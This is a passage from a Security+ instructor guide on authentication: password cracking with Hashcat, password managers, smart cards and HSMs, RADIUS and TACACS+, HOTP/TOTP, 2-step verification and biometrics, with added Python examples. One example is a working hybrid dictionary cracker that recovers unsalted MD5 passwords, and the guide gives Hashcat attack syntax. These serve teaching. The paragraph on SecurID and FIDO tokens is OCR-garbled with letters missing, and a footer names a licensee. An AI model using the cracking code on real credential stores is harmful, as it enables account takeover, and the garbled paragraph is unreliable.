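The dictionary, rainbow-table, salt and hybrid ideas above, worked through as an added example that is not part of the original guide: Python code that generates hybrid candidates (dictionary words with capitalisation, the s/$ and o/0 substitutions the text mentions, and a one-digit suffix mask), precomputes a lookup table once and cracks several unsalted MD5 hashes by lookup, then shows that salted PBKDF2 records force every candidate to be re-derived per record. The word list, the victim passwords and the deliberately low PBKDF2 iteration count are constructed for the demo.

```python
import hashlib
import os

WORDLIST = ["password", "james", "summer", "welcome", "letmein"]  # constructed, tiny dictionary
DEMO_ITERATIONS = 2000  # deliberately low so the demo runs in well under a second; use far more in production


def hybrid_candidates(words):
    """Hybrid attack: each dictionary word, a capitalised form and a 'leet' form (s->$, o->0),
    each with a one-digit numeric suffix mask. Comparable to a hashcat rule plus a ?d mask."""
    for w in words:
        for v in dict.fromkeys([w, w.capitalize(), w.replace("s", "$").replace("o", "0")]):
            yield v
            for n in range(10):
                yield f"{v}{n}"


def store_unsalted(password):
    """Legacy storage: a bare fast hash. Identical passwords give identical hashes everywhere."""
    return hashlib.md5(password.encode()).hexdigest()


def store_salted(password, iterations=DEMO_ITERATIONS):
    """Salted, slow storage: a per-record random salt and PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    return salt.hex(), hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def precompute_table(words):
    """The precomputation that rainbow tables refine: hash every candidate once, up front."""
    return {store_unsalted(c): c for c in hybrid_candidates(words)}


def crack_unsalted(hashes, table):
    """With no salt, cracking is a dictionary lookup, and one table serves every victim."""
    return {h: table[h] for h in hashes if h in table}


def crack_salted(records, words, iterations=DEMO_ITERATIONS):
    """With salts nothing can be precomputed: every candidate is re-derived per record.
    Returns the passwords found and the number of PBKDF2 derivations it cost."""
    found, work = {}, 0
    for salt_hex, digest in records:
        salt = bytes.fromhex(salt_hex)
        for c in hybrid_candidates(words):
            work += 1
            if hashlib.pbkdf2_hmac("sha256", c.encode(), salt, iterations).hex() == digest:
                found[digest] = c
                break
    return found, work


def demo():
    """Constructed scenario: three unsalted and two salted records; one is a long passphrase."""
    table = precompute_table(WORDLIST)
    unsalted = [store_unsalted(p) for p in ("james1", "Summer7", "correct horse battery staple")]
    salted = [store_salted(p) for p in ("james1", "correct horse battery staple")]
    found_salted, work = crack_salted(salted, WORDLIST)
    return {"table_size": len(table),
            "unsalted_cracked": sorted(crack_unsalted(unsalted, table).values()),
            "salted_cracked": sorted(found_salted.values()),
            "salted_work": work}
```

demo() cracks james1 and Summer7 from the unsalted set with a 154-entry table built once, never finds the passphrase, and finds the salted james1 only by re-deriving candidates for that record (190 derivations for the two records in total). Raising the iteration count multiplies that per-record cost; the salt is what stops the cost being paid once for everyone.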


Password Crackers

Show Slide(s): Password Crackers

Although there are some Windows tools, including the infamous Cain and L0phtcrack (l0phtcrack.com) tools, most password crackers run primarily on Linux. For example, a tool such as Hashcat (hashcat.net/hashcat) is run using the following general syntax:

hashcat -m <HashType> -a <AttackMode> -o <OutputFile> <InputHashFile>

The input file should contain hashes of the same type, using the specified format (hashcat.net/wiki/doku.php?id=example_hashes). Hashcat can be used with a single word list (dictionary mode -a 0) or multiple word lists (combinator mode -a 1). Mode -a 3 performs a brute-force attack, but this can be combined with a mask for each character position. This reduces the key space that must be searched and speeds up the attack. For example, you might learn or intuit that a company uses only letter characters in passwords. By omitting numeric and symbol characters, you can speed up the attack on each hash.

Running a masked brute-force attack (this example is running on a VM, so the recovery rate is very low). (Screenshot: hashcat hashcat.net/hashcat.)

Authentication Management

Show Slide(s): Authentication Management

Users often adopt poor credential management practices that are very hard to control, such as using the same password for corporate networks and consumer websites. This makes enterprise network security vulnerable to data breaches from these websites. An authentication management solution for passwords mitigates this risk by using a device or service as a proxy for credential storage. The manager generates a unique, strong password for each web-based account. The user authorizes the manager to authenticate with each site using a master password.

Password managers can be implemented with a hardware token or as a software app:

• Password key: USB tokens for connecting to PCs and smartphones. Some can use nearfield communications (NFC) or Bluetooth as well as physical connectivity (theverge.com/.../the-best-hardware-security-keys-yubico-titan-key-u2f).

• Password vault: software-based password manager, typically using a cloud service to allow access from any device (pcmag.com/picks/the-best-password-managers). A USB key is also likely to use a vault for backup. Most operating systems and browsers implement native password vaults. Examples include Windows Credential Manager and Apple's iCloud Keychain (imore.com/icloud-keychain).

Authentication management products can be certified under the Federal Information Processing Standard (FIPS 140-2). This provides assurance that the cryptographic implementation meets a certain level of robustness.


Review Activity:
Knowledge-Based Authentication

Answer the following questions:

1. Why might a PIN be a particularly weak type of "something you know" authentication?

A long personal identification number (PIN) is difficult for users to remember, but a short PIN is easy to crack. A PIN can only be used safely where the number of sequential authentication attempts can be strictly limited.

2. In what scenario would PAP be considered a secure authentication method?

PAP is a legacy protocol that cannot be considered secure because it transmits plaintext ASCII passwords and has no cryptographic protection. The only way to ensure the security of PAP is to ensure that the endpoints established a secure tunnel (using IPsec, for instance).

3. True or false? In order to create a service ticket, Kerberos passes the user's password to the target application server for authentication.

False: only the KDC verifies the user credential. The Ticket Granting Service (TGS) sends the user's account details (SID) to the target application for authorization (allocation of permissions), not authentication.

4. A user maintains a list of commonly used passwords in a file located deep within the computer's directory structure. Is this secure password management?

No. This is security by obscurity. The file could probably be easily discovered using search tools.

5. Which property of a plaintext password is most effective at defeating a brute-force attack?

The length of the password. If the password does not have any complexity (if it is just two dictionary words, for instance), it may still be vulnerable to a dictionary-based attack. A long password may still be vulnerable if the output space is small or if the mechanism used to hash the password is faulty (LM hashes being one example).


Topic 7C
Implement Authentication Technologies

EXAM OBJECTIVES COVERED
2.4 Summarize authentication and authorization design concepts
3.3 Given a scenario, implement secure network designs (HSM only)
3.8 Given a scenario, implement authentication and authorization solutions

Teaching Tip: This topic covers the ownership factor. As well as smart cards, HSMs, and tokens, we look at EAP and RADIUS/TACACS+ as certificate-based authentication mechanisms.

Authentication technologies can be used as a "something you have" or ownership/possession factor. Many organizations are deploying multifactor authentication systems based on smart cards and key fobs. You are likely to have to support the installation and configuration of these technologies during your career.
Smart-Card Authentication

Show Slide(s): Smart-Card Authentication

Smart-card authentication means programming cryptographic information onto a card equipped with a secure processing chip. The chip stores the user's digital certificate, the private key associated with the certificate, and a personal identification number (PIN) used to activate the card.

For Kerberos authentication, smart-card logon works as follows:

1. The user presents the smart card to a reader and is prompted to enter a PIN.

2. Inputting the correct PIN authorizes the smart card's cryptoprocessor to use its private key to create a Ticket Granting Ticket (TGT) request, which is transmitted to the authentication server (AS).

3. The AS is able to verify the request because it has the matching public key (the request is signed with the private key, which never leaves the card) and trusts the user's certificate, either because it was issued by a local certification authority or by a third-party CA that is a trusted root CA.

4. The AS responds with the TGT and Ticket Granting Service (TGS) session key.

Teaching Tip: Multifactor authentication is a strong solution but can also be an expensive one. Along with hardware and software costs, there may be additional support costs when authentication fails and a valid user cannot access the network.

Smart card can refer to a wide range of different technologies. Secure Kerberos-based authentication requires a card with a cryptoprocessor (smartcardbasics.com/smart-card-types.html).

Key Management Devices

Show Slide(s): Key Management Devices

When using public key infrastructure (PKI) for smart-card authentication, the security of the private key issued to each user is critical. One problem is that only the user should ever be in ownership of the private key. If the network administrator is able to view these keys, they can impersonate any subject. Various technologies can be used to avoid the need for an administrator to generate a private key and transmit it to the user:

• Smart card: some cards are powerful enough to generate key material using the cryptoprocessor embedded in the card.

• USB key: a cryptoprocessor can also be implemented in the USB form factor.

• Trusted Platform Module (TPM): a secure cryptoprocessor enclave implemented on a PC, laptop, smartphone, or network appliance. The TPM is either a discrete chip on the motherboard or firmware running within the CPU. Modification of TPM data is only permitted by highly trusted processes. A TPM can be used to present a virtual smart card (docs.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-overview).

Teaching Tip: Although CAC and PIV are no longer content examples, they are still in the acronyms list. There are glossary terms for both, if you want to draw students' attention to them.

Lesson 7: Implementing Authentication Controls | Topic 7C

Smart cards, USB keys, and virtual smart cards are provisioned as individual devices. Often keys need to be provisioned to non-user devices too, such as servers and network appliances. A hardware security module (HSM) is a network appliance designed to perform centralized PKI management for a network of devices. This means that it can act as an archive or escrow for keys in case of loss or damage. Compared to using a general-purpose server for certificate services, HSMs are optimized for the role and so have a smaller attack surface. HSMs are designed to be tamper-evident to mitigate risk of insider threat, and can also provide enterprise-strength cryptographically secure pseudorandom number generators (CSPRNGs). HSMs can be implemented in several form factors, including rack-mounted appliances, plug-in PCIe adapter cards, and USB-connected external peripherals.

The FIPS 140-2 scheme provides accreditation for cryptographically strong products (ncipher.com/faq/key-secrets-management/what-fips-140-2).

Smart card, smart card reader, and hardware security module. (Images © 123RF.com.)

Extensible Authentication Protocol/IEEE 802.1X

Show Slide(s): Extensible Authentication Protocol/IEEE 802.1X

The smart-card authentication process described earlier is used for Kerberos authentication where the computer is attached to the local network and the user is logging on to Windows. Authentication may also be required in other contexts:

• When the user is accessing a wireless network and needs to authenticate with the network database.

• When a device is connecting to a network via a switch and network policies require the user to be authenticated before the device is allowed to communicate.

• When the user is connecting to the network over a public network via a virtual private network (VPN).

In these scenarios, the Extensible Authentication Protocol (EAP) provides a framework for deploying multiple types of authentication protocols and technologies. EAP allows lots of different authentication methods, but many of them use a digital certificate on the server and/or client machines. This allows the machines to establish a trust relationship and create a secure tunnel to transmit the user credential or to perform smart-card authentication without a user password.

Teaching Tip: We introduce EAP and AAA servers here as part of certificate-based authentication and the objectives listed above, but we will also look at port security/NAC and Wi-Fi enterprise authentication later in the course.

Where EAP provides the authentication mechanisms, the IEEE 802.1X Port-based Network Access Control (NAC) protocol provides the means of using an EAP method when a device connects to an Ethernet switch port, wireless access point (with enterprise authentication configured), or VPN gateway. 802.1X uses authentication, authorization, and accounting (AAA) architecture:

• Supplicant: the device requesting access, such as a user's PC or laptop.

• Network access server (NAS): edge network appliances, such as switches, access points, and VPN gateways. These are also referred to as RADIUS clients or authenticators.

• AAA server: the authentication server, positioned within the local network.

With AAA, the NAS devices do not have to store any authentication credentials. They forward this data between the AAA server and the supplicant. There are two main types of AAA server: RADIUS and TACACS+.

Remote Authentication Dial-in User Service

Show Slide(s): Remote Authentication Dial-in User Service

The Remote Authentication Dial-in User Service (RADIUS) standard is published as an Internet standard. There are several RADIUS server and client products.

The NAS device (RADIUS client) is configured with the IP address of the RADIUS server and with a shared secret. This allows the client to authenticate to the server. Remember that the client is the access device (switch, access point, or VPN gateway), not the user's PC or laptop. A generic RADIUS authentication workflow proceeds as follows:

1. The user's device (the supplicant) makes a connection to the NAS appliance, such as an access point, switch, or remote access server.

RADIUS authentication with EAP overview. (Images © 123RF.com.)

2. The NAS prompts the user for their authentication credentials. RADIUS supports PAP, CHAP, and EAP. Most implementations now use EAP, as PAP and CHAP are not secure. If EAP credentials are required, the NAS enables the supplicant to transmit EAP over LAN (EAPoL) data, but does not allow any other type of network traffic.

3. The supplicant submits the credentials as EAPoL data. The RADIUS client uses this information to create an Access-Request RADIUS packet. RADIUS does not encrypt the packet as a whole: only the User-Password attribute is obfuscated with the shared secret, and a Message-Authenticator attribute keyed with the shared secret protects the packet's integrity. For this reason RADIUS traffic should be confined to a trusted management network or carried inside an IPsec or TLS tunnel. The NAS sends the Access-Request to the AAA server using UDP on port 1812 (by default).

4. The AAA server validates the Access-Request using the shared secret. If validation fails (because the shared secret is not correctly configured, for instance), the server silently discards the packet and does not respond; the NAS sees only a timeout.

5. With EAP, there will be an exchange of Access-Challenge and Access-Request packets as the authentication method is set up and the credentials verified. The NAS acts as a pass-thru, taking RADIUS messages from the server, and encapsulating them as EAPoL to transmit to the supplicant.

6. At the end of this exchange, if the supplicant is authenticated, the AAA server responds with an Access-Accept packet; otherwise, an Access-Reject packet is returned.

Optionally, the NAS can use RADIUS for accounting (logging). Accounting uses port 1813. The accounting server can be different from the authentication server.
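The Access-Request/Access-Accept exchange above, worked through as an added example that is not part of the original guide: a Python construction of the RADIUS packets with the User-Password hiding defined in RFC 2865 section 5.2, the Message-Authenticator of RFC 2869, and the Response Authenticator the NAS uses to trust the reply. It shows a PAP-style password exchange rather than the EAP pass-through in step 5, because that is where the shared-secret mechanics are visible. The user name, password, NAS address (192.0.2.10, a documentation range) and shared secrets are constructed; the silent discard on a wrong secret is the behaviour step 4 describes.

```python
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, MESSAGE_AUTHENTICATOR = 1, 2, 4, 80


def attr(kind, value):
    """Type-Length-Value attribute; Length covers the two header bytes."""
    return bytes([kind, len(value) + 2]) + value


def parse_attrs(data):
    attrs, i = [], 0
    while i < len(data):
        kind, length = data[i], data[i + 1]
        attrs.append((kind, data[i + 2:i + length]))
        i += length
    return attrs


def build(code, ident, authenticator, attrs):
    body = b"".join(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def hide_password(password, secret, request_auth):
    """RFC 2865 s5.2: pad to 16-byte blocks, XOR each with an MD5 chain keyed by the shared secret."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        prev = bytes(p ^ b for p, b in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out += prev
    return out


def reveal_password(hidden, secret, request_auth):
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += bytes(c ^ b for c, b in zip(block, hashlib.md5(secret + prev).digest()))
        prev = block
    return out.rstrip(b"\x00")


def message_authenticator(code, ident, request_auth, attrs, secret):
    """RFC 2869 Message-Authenticator: HMAC-MD5 over the packet with this attribute's value zeroed."""
    zeroed = [attr(MESSAGE_AUTHENTICATOR, bytes(16)) if k == MESSAGE_AUTHENTICATOR else attr(k, v)
              for k, v in attrs]
    return hmac.new(secret, build(code, ident, request_auth, zeroed), hashlib.md5).digest()


def access_request(user, password, nas_ip, secret, ident=7):
    """What the NAS (RADIUS client) sends; only User-Password is hidden, everything else is cleartext."""
    request_auth = os.urandom(16)
    attrs = [(USER_NAME, user), (USER_PASSWORD, hide_password(password, secret, request_auth)),
             (NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))), (MESSAGE_AUTHENTICATOR, bytes(16))]
    attrs[-1] = (MESSAGE_AUTHENTICATOR, message_authenticator(ACCESS_REQUEST, ident, request_auth, attrs, secret))
    return build(ACCESS_REQUEST, ident, request_auth, [attr(k, v) for k, v in attrs])


def handle(packet, secret, users):
    """The AAA server. Returns the reply packet, or None when the request is silently discarded."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    request_auth, attrs = packet[4:20], parse_attrs(packet[20:length])
    fields = dict(attrs)
    expected = message_authenticator(code, ident, request_auth, attrs, secret)
    if MESSAGE_AUTHENTICATOR not in fields or not hmac.compare_digest(fields[MESSAGE_AUTHENTICATOR], expected):
        return None  # wrong shared secret or tampering: RFC 2865 says discard; the NAS just sees a timeout
    password = reveal_password(fields[USER_PASSWORD], secret, request_auth)
    ok = hmac.compare_digest(users.get(fields[USER_NAME], b""), password)
    body = b""
    header = struct.pack("!BBH", ACCESS_ACCEPT if ok else ACCESS_REJECT, ident, 20 + len(body))
    # Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)
    return header + hashlib.md5(header + request_auth + body + secret).digest() + body


def verify_reply(reply, request, secret):
    """NAS side: a reply is only trusted if its Response Authenticator checks out under the shared secret."""
    header, resp_auth, body = reply[:4], reply[4:20], reply[20:]
    return hmac.compare_digest(resp_auth, hashlib.md5(header + request[4:20] + body + secret).digest())


def demo():
    """Constructed scenario: one user, one NAS, one shared secret, and a NAS with the secret mistyped."""
    secret, users, nas = b"nas-shared-secret", {b"alice": b"correct horse battery staple"}, "192.0.2.10"
    good = access_request(b"alice", b"correct horse battery staple", nas, secret)
    reply = handle(good, secret, users)
    bad_pw = handle(access_request(b"alice", b"wrong", nas, secret), secret, users)
    bad_secret = handle(access_request(b"alice", b"correct horse battery staple", nas, b"typo"), secret, users)
    return {"accept_code": reply[0], "accept_verified": verify_reply(reply, good, secret),
            "reject_code": bad_pw[0], "bad_secret_reply": bad_secret}
```

The MD5-based password hiding is reversible by anyone who learns the shared secret, and it does nothing for the other attributes, which is the practical reason for the tunnelling advice in step 3 and for choosing long, random shared secrets per NAS.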

Terminal Access Controller Access-Control System

Show Slide(s): Terminal Access Controller Access-Control System

RADIUS is used primarily for network access control. AAA services are also used for the purpose of centralizing logins for the administrative accounts for network appliances. This allows network administrators to be allocated specific privileges on each switch, router, access point, and firewall. Whereas RADIUS can be used for this network appliance administration role, the Cisco-developed Terminal Access Controller Access-Control System Plus (TACACS+) is specifically designed for this purpose (cisco.com/c/en/us/support/docs/security-vpn/remote-authentication-dial-user-service-radius).

• TACACS+ uses TCP communications (over port 49), and this reliable, connection-oriented delivery makes it easier to detect when a server is down.

• All the data in TACACS+ packets is encrypted (except for the header identifying the packet as TACACS+ data), rather than just the authentication data. This protects the confidentiality of critical network infrastructure data in transit, but note that the cipher is an MD5-derived keystream with no integrity check, so TACACS+ should still be confined to a trusted management network or a TLS tunnel.

• Authentication, authorization, and accounting functions are discrete. Many device management tasks require reauthentication (similar to having to re-enter a password for sudo or UAC) and per-command authorizations and privileges for users, groups, and roles. TACACS+ supports this workflow better than RADIUS.

Token Keys and Static Codes

Show Slide(s): Token Keys and Static Codes

Smart-card authentication works well when you have close control over user accounts and the devices used on the network. Other types of ownership-based authentication technologies use various hardware and software tokens. These avoid some of the management issues of using the digital certificates required by smart-card authentication.

Teaching Tip: FIDO is not on the syllabus, but it is worth mentioning in terms of general awareness of token key methods.

A one-time password (OTP) is one that is generated automatically, rather than being chosen by a user, and used only once. Consequently, it is not vulnerable to password guessing or sniffing attacks (although a code phished and relayed to the real service within its validity window still works, which is why the server must refuse to accept the same code twice). An OTP is generated using some sort of hash function on a secret value plus a synchronization value (seed), such as a timestamp or counter.

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
168 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ey fob token generator. (Image 1 .com.)

The ecurID token from A represents one popular implementation of an T token


key. The device generates a passcode based on the current time and a secret key
coded into the device. The code is entered along with a IN or password known only
to the user. Network access devices must be configured with an agent to intercept the
credentials and direct them to an Authentication Manager server for validation. This
server can integrate with directory products, such as AD.
There are also simpler token keys and smart cards that simply transmit a static token
programmed into the device. or e ample, many building entry systems work on the
basis of static codes. These mechanisms are highly vulnerable to cloning and replay
attacks.
There are many other ways of implementing hardware token keys. or e ample, a
ast Identity nline ID niversal econd actor token registers a public
key with the authentication service. The authentication mechanism then re uires the
private key locked to the token, which is authori ed using IN or fingerprint activation
fidoalliance.org showcase fido u f security key . This can also be used with the
indows ello authentication provider microsoft.com security blog
advancing windows passwordless platform .

Show Slide(s): Open Authentication

Open Authentication
The Initiative for Open Authentication (OATH) is an industry body established with the aim of developing an open, strong authentication framework. Open means a system that any enterprise can link into to perform authentication of users and devices across different networks. Strong means that the system is based not just on passwords, but also on 2- or 3-factor authentication or on 2-step verification. OATH has developed two algorithms for implementing one-time passwords (OTPs).

HMAC-Based One-Time Password Algorithm (HOTP)

HMAC-based One-time Password Algorithm (HOTP) is an algorithm for token-based authentication (tools.ietf.org/html/rfc4226). The authentication server and client token are configured with the same shared secret. RFC 4226 requires this to be at least 128 bits (16 bytes) and recommends 160 bits, generated by a cryptographically strong random number generator. The token could be a fob-type device or implemented as a smartphone authenticator app. The shared secret can be transmitted to the smartphone app as a QR code image acquirable by the phone's camera so that the user doesn't have to type anything. Obviously, it is important that no other device is able to acquire the shared secret; the enrollment QR code is the secret, so it must be displayed only over a protected session and never logged, screenshotted, or emailed. The shared secret is combined with a counter to create a one-time password when the user wants to authenticate. The device and server both compute the HMAC, truncate it, and derive an HOTP value that is 6 to 8 digits long. This is the value that the user must enter to authenticate with the server. The counter is then incremented by one on both sides.

The server is configured with a counter window to cope with the circumstance that the device and server counters move out of sync. This could happen if the user generates an OTP but does not use it, for instance. The window should only look ahead: accepting counter values the server has already passed would allow a captured code to be replayed.

Time-Based One-Time Password Algorithm (TOTP)

The Time-based One-time Password Algorithm (TOTP) is a refinement of HOTP (tools.ietf.org/html/rfc6238). One issue with HOTP is that an unused code remains valid until the counter moves past it, so an attacker who obtains one (by shoulder surfing or phishing, for instance) could use it at any later time. In TOTP, the HMAC is built from the shared secret plus a value derived from the device's and server's local timestamps (the number of fixed-length time steps since the Unix epoch). TOTP automatically expires each code after a short window (30 seconds is the RFC default). For this to work, the client device and server must be closely time-synchronized; servers usually accept one time step either side of the current one to tolerate clock drift. One well-known implementation of HOTP and TOTP is Google Authenticator.
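The HOTP and TOTP descriptions above can be checked against the RFCs directly. The following is an added example for this page, not code from the Instructor Guide or from any OATH implementation: it builds both algorithms from the Python standard library, adds the look-ahead counter window for HOTP and the one-step clock tolerance for TOTP described above, and uses the 20-byte test secret published in RFC 4226 Appendix D and RFC 6238 Appendix B so the results can be compared with the RFC tables.

```python
# Added example: HOTP (RFC 4226) and TOTP (RFC 6238) built from the Python standard
# library, plus the server-side counter window and time-step tolerance discussed above.
# Not code from the Instructor Guide; the test secret is the one published in the RFCs.
import hashlib
import hmac
import struct
import time

# 20-byte ASCII secret used for the test vectors in RFC 4226 Appendix D and RFC 6238 Appendix B.
RFC_TEST_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algorithm=hashlib.sha1) -> str:
    """RFC 4226: HMAC over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algorithm).digest()
    offset = mac[-1] & 0x0F                                             # low nibble picks a 4-byte window
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF  # clear the sign bit
    return str(code % (10 ** digits)).zfill(digits)                     # keep leading zeros


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6,
         algorithm=hashlib.sha1, t0: int = 0) -> str:
    """RFC 6238: HOTP with the counter replaced by the number of time steps since t0."""
    return hotp(secret, (unix_time - t0) // step, digits, algorithm)


def verify_hotp(secret: bytes, submitted: str, server_counter: int, window: int = 10):
    """Look-ahead resynchronization: accept a code for any counter in
    [server_counter, server_counter + window). Returns the counter to store next
    (one past the match) or None. Counters behind the server are never accepted,
    so a code that has already been used cannot be replayed."""
    for c in range(server_counter, server_counter + window):
        if hmac.compare_digest(hotp(secret, c), submitted):
            return c + 1
    return None


def verify_totp(secret: bytes, submitted: str, unix_time: int, step: int = 30, skew: int = 1) -> bool:
    """Accept the current step and `skew` steps either side to tolerate clock drift."""
    return any(hmac.compare_digest(totp(secret, unix_time + k * step, step), submitted)
               for k in range(-skew, skew + 1))


if __name__ == "__main__":
    print("HOTP counter 0:", hotp(RFC_TEST_SECRET, 0))          # 755224 per RFC 4226
    print("TOTP now:      ", totp(RFC_TEST_SECRET, int(time.time())))
```

A production TOTP verifier also records the last time step it accepted for each user, so that the same code cannot be accepted twice within the skew window; that bookkeeping is left out here to keep the algorithm itself visible.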

Two-step verification mechanism protecting web application access. The site sends a one-time code valid for five minutes to the registered cell phone by SMS.

Don't confuse OATH (Open Authentication) with OAuth (Open Authorization).


Show Slide(s): 2-Step Verification

Teaching Tip: The term 2-step verification is not used on the objectives document, but students should understand the difference between these mechanisms and token keys.

2-Step Verification
2-step verification or out-of-band mechanisms generate a software token on a server and send it to a resource assumed to be safely controlled by the user. The token can be transmitted to the device in a number of ways:

• Short Message Service (SMS): the code is sent as a text to the registered phone number.

• Phone call: the code is delivered as an automated voice call to the registered phone number.

• Push notification: the code is sent to a registered authenticator app on the PC or smartphone.

• Email: the code is sent to a registered email account.

These mechanisms are sometimes also described as 2-factor authentication (2FA). However, anyone intercepting the code within the time frame could enter it as "something you know" without ever possessing or looking at the device itself (auth0.com/blog/why-sms-multi-factor-still-matters). SMS and voice delivery are additionally exposed to SIM-swap fraud and interception of the carrier network, so they are weaker than a push to an authenticator app or a hardware token.
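The server side of such a mechanism is simple, but a short numeric code needs several controls that the channel list above does not show: unpredictable generation, expiry, single use, and a cap on guesses (a 6-digit code has only a million values). The following is an added example written for this page, not code from the Instructor Guide or any vendor product. The `send` callable is a constructed stand-in for an SMS, voice, push, or email gateway, and the injectable clock exists so that expiry can be exercised without waiting.

```python
# Added example: the server half of an out-of-band (2-step) verification code, with the
# controls a short numeric code needs: CSPRNG generation, expiry, single use, an attempt
# cap and constant-time comparison. The delivery callable is a constructed stand-in for an
# SMS, voice, push or email gateway; none of this is code from the Instructor Guide.
import hmac
import secrets
import time
from dataclasses import dataclass

CODE_DIGITS = 6
CODE_LIFETIME_S = 300   # five minutes, as in the figure caption above
MAX_ATTEMPTS = 3        # 10^6 possible codes: without a cap, online guessing is feasible


@dataclass
class PendingCode:
    code: str
    expires_at: float
    attempts: int = 0
    used: bool = False


class OutOfBandVerifier:
    def __init__(self, send, now=time.time):
        self._send = send         # send(destination, message) -> None; e.g. an SMS gateway client
        self._now = now           # injectable clock so expiry can be tested deterministically
        self._pending = {}        # user -> PendingCode; one live code per user

    def issue(self, user: str, destination: str) -> None:
        # secrets, not random: the code must be unguessable to anyone who did not receive it
        code = str(secrets.randbelow(10 ** CODE_DIGITS)).zfill(CODE_DIGITS)
        self._pending[user] = PendingCode(code, self._now() + CODE_LIFETIME_S)
        self._send(destination, f"Your verification code is {code}")

    def verify(self, user: str, submitted: str) -> bool:
        entry = self._pending.get(user)
        if entry is None or entry.used or self._now() > entry.expires_at:
            self._pending.pop(user, None)          # nothing live for this user
            return False
        entry.attempts += 1
        if entry.attempts > MAX_ATTEMPTS:
            self._pending.pop(user, None)          # too many guesses: the user must request a new code
            return False
        if not (submitted.isascii() and submitted.isdigit()):
            return False                           # compare_digest needs ASCII; reject junk input
        if hmac.compare_digest(entry.code, submitted):
            entry.used = True                      # single use: the same code is refused if replayed
            return True
        return False
```

None of these controls addresses the weakness the text describes: a code relayed by a phishing page within the five-minute window still verifies, because the server cannot tell who typed it. Only a challenge bound to the origin, as with FIDO tokens, removes that risk.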


Review Activity:
Authentication Technologies
Answer the following questions:

1. True or False? When implementing smart card logon, the user's private key is stored on the smart card.

True. The smart card implements a cryptoprocessor for secure generation and storage of key and certificate material; the private key is generated on the card and never leaves it.

2. You are providing consultancy to a firm to help them implement smart card authentication to premises networks and cloud services. What are the main advantages of using an HSM over server-based key and certificate management services?

A hardware security module (HSM) is optimized for this role and so presents a smaller attack surface. It is designed to be tamper-evident to mitigate against insider threat risks. It is also likely to have a better implementation of a random number generator, improving the security properties of key material.

3. Which network access control framework supports smart cards?

Local logon providers, such as Kerberos, support smart cards, but this is not network access control as the device has already been allowed on the network. The IEEE 802.1X framework means that network access servers (switches, access points, and VPN gateways) can accept Extensible Authentication Protocol (EAP) credentials, but block any other type of network access. They act as pass-thru for an authentication server, which stores and validates the credentials. Some EAP types (EAP-TLS, for instance) support smart card or machine authentication.

4. What is a RADIUS client?

A device or server that accepts user connections, often referred to as a network access server (NAS) or as the authenticator. Using RADIUS architecture, the client does not need to be able to perform authentication itself; it performs pass-thru to an AAA server.

5. What is EAPoL?

A network access server that supports 802.1X port-based access control can enable a port but allow only the transfer of Extensible Authentication Protocol over LAN (EAPoL) traffic. This allows the supplicant and authentication server to perform the authentication process, with the network access server acting as a pass-thru.

6. How does OTP protect against password guessing or sniffing attacks?

A one-time password mechanism generates a code that can be used only once and, in the time-based variant, is valid only for a short period (usually 30 to 60 seconds) before it changes again. A code captured by sniffing is worthless once it has been used or has expired, and there is no fixed secret for a guessing attack to converge on.


Topic 7D
Summarize Biometrics
Authentication Concepts

EXAM OBJECTIVES COVERED
2.4 Summarize authentication and authorization design concepts

Teaching Tip: This final part of the authentication lesson covers biometric technologies. These are relatively straightforward concepts and the examples are at a summarize rather than implement level, so try not to spend too much time on this topic.

Biometric authentication mechanisms allow users to access an account through a physiological feature (fingerprint or iris pattern, for instance) or behavioral pattern. Being able to summarize the advantages and drawbacks of biometric mechanisms will allow you to support the deployment and use of these technologies.

Show Slide(s): Biometric Authentication

Teaching Tip: Make sure that students understand biometrics are based on unique features, not basic descriptions such as eye color.

Biometric Authentication
The first step in setting up biometric authentication is enrollment. The chosen biometric information is scanned by a biometric reader and converted to binary information. There are generally two steps in the scanning process:

1. A sensor module acquires the biometric sample from the target.

2. A feature extraction module records the features in the sample that uniquely identify the target.

The biometric template is kept in the authentication server's database. When the user wants to access a resource, he or she is re-scanned, and the scan is compared to the template. If they match to within a defined degree of tolerance, access is granted. Because a biometric cannot be changed if it is compromised, the stored template must be protected at least as carefully as a password hash; consumer devices typically keep the template in dedicated secure hardware and match on the device rather than exporting the biometric.

Several pattern types can be used to identify people biometrically. These can be categorized as physical (fingerprint, eye, and facial recognition) or behavioral (voice, signature, and typing pattern matching). Key metrics and considerations used to evaluate the efficacy rate of biometric pattern acquisition and matching and suitability as an authentication mechanism include the following:
• False Rejection Rate (FRR): where a legitimate user is not recognized. This is also referred to as a Type I error or false non-match rate (FNMR). FRR is measured as a percentage.

• False Acceptance Rate (FAR): where an interloper is accepted (Type II error or false match rate [FMR]). FAR is measured as a percentage.

False rejections cause inconvenience to users, but false acceptance can lead to security breaches, and so is usually considered the most important metric.

• Crossover Error Rate (CER): the point at which FRR and FAR meet as the matching threshold is varied. The lower the CER, the more efficient and reliable the technology.

The CER is a way of comparing technologies, not necessarily the setting to deploy. Tightening the threshold lowers FAR at the cost of a higher FRR, and a system protecting a sensitive area would normally be tuned to a FAR target well below the crossover point, accepting the extra false rejections.

• Throughput (speed): the time required to create a template for each user and the time required to authenticate. This is a major consideration for high-traffic access points, such as airports or railway stations.

• Failure to Enroll Rate (FER): incidents in which a template cannot be created and matched for a user during enrollment.

